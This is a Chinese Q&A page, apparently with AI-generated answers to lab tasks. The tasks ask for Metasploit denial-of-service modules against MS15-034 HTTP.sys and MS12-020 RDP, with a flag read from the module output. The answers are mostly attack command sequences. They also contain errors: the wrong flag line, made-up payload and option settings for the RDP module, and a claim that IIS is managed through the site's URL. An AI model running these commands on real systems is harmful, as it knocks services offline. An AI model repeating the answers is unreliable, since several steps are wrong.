进入靶机在IIS网站下的编辑输出缓存设置中禁止启用内核缓存,再次运行MS15034HTTP.SYS漏洞的拒绝服务攻击模块,运行此模块并将回显结果中倒数第2行的最后一个单词作为Flag值提交命令
时间: 2024-02-16 11:03:24 浏览: 169
好的,以下是在禁用内核缓存后再次运行MS15034HTTP.SYS漏洞的拒绝服务攻击模块,并获取Flag值的命令:
```
use auxiliary/dos/windows/http/ms15_034_http_sys_memory_dos
set RHOST <目标IP>
set THREADS <线程数>
set RPORT <目标端口>
run
```
请将`<目标IP>`替换为您要攻击的目标IP地址,`<线程数>`替换为要使用的线程数量,建议默认值为1,`<目标端口>`为要攻击的目标端口,默认值为80。
执行完毕后,将回显结果中倒数第2行的最后一个单词作为Flag值提交即可。例如:
```
[*] Sending DoS packets to <目标IP>:80 (press CTRL+C to stop)
[-] <目标IP> - DoS failed: Connection refused
[*] Auxiliary module execution completed
```
则Flag值为:`completed`。
相关问题
进入靶机在IIS网站下的编辑输出缓存设置中禁止启用内核缓存,再次运行MS15034HTTP.SYS漏洞的拒绝服务攻击模块,运行此模块并将回显结果中倒数第2行的最后一个单词作为Flag值提交
好的,以下是在禁用内核缓存后再次运行MS15034HTTP.SYS漏洞的拒绝服务攻击模块,并获取Flag值的步骤:
1. 进入靶机的IIS管理界面
在浏览器中输入`http://<靶机IP>`,进入靶机的IIS管理界面。
2. 进入编辑输出缓存设置
在IIS管理界面中,找到需要禁用内核缓存的网站,进入该网站的“编辑输出缓存”设置页面。
3. 禁用内核缓存
在“编辑输出缓存”设置页面中,找到“高级设置”选项卡,将“启用内核缓存”选项设置为“false”,并点击“确定”按钮保存设置。
4. 调用漏洞攻击模块
```
msf6 > use auxiliary/dos/windows/http/ms15_034_http_sys_memory_dos
```
5. 设置目标IP地址
```
msf6 auxiliary(dos/windows/http/ms15_034_http_sys_memory_dos) > set RHOST <目标IP>
```
请将`<目标IP>`替换为您要攻击的目标IP地址。
6. 设置攻击参数
```
msf6 auxiliary(dos/windows/http/ms15_034_http_sys_memory_dos) > set THREADS <线程数>
msf6 auxiliary(dos/windows/http/ms15_034_http_sys_memory_dos) > set RPORT <目标端口>
```
其中,`<线程数>`为要使用的线程数量,建议默认值为1;`<目标端口>`为要攻击的目标端口,默认值为80。
7. 运行攻击模块
```
msf6 auxiliary(dos/windows/http/ms15_034_http_sys_memory_dos) > run
```
运行攻击模块后,将会自动对目标IP进行拒绝服务攻击。
8. 获取Flag值
执行完毕后,将回显结果中倒数第2行的最后一个单词作为Flag值提交即可。例如:
```
[*] Sending DoS packets to <目标IP>:80 (press CTRL+C to stop)
[-] <目标IP> - DoS failed: Connection refused
[*] Auxiliary module execution completed
```
则Flag值为:`completed`。
进入靶机关闭远程桌面服务,再次运行MS12020RDP拒绝服务漏洞的攻击模块,运行此模块并将回显结果中倒数第2行的最后一个单词作为Flag值提交。
请注意,未经授权的攻击是违法行为,本平台不提倡也不支持此类行为。以下是在靶机关闭远程桌面服务后利用MS12-020漏洞进行攻击的命令:
```
use exploit/windows/rdp/ms12_020_maxchannelids
set RHOST <目标IP>
set PAYLOAD <payload名称>
set LHOST <本地IP>
set LPORT <本地端口>
set DisableRemoteDesktop 1
exploit
```
请将`<目标IP>`替换为您要攻击的目标IP地址,将`<payload名称>`替换为您要使用的有效载荷名称,将`<本地IP>`替换为您的本地IP地址,将`<本地端口>`替换为您要使用的本地端口号。运行完成后,找到回显结果中倒数第2行的最后一个单词即可作为Flag值提交。
阅读全文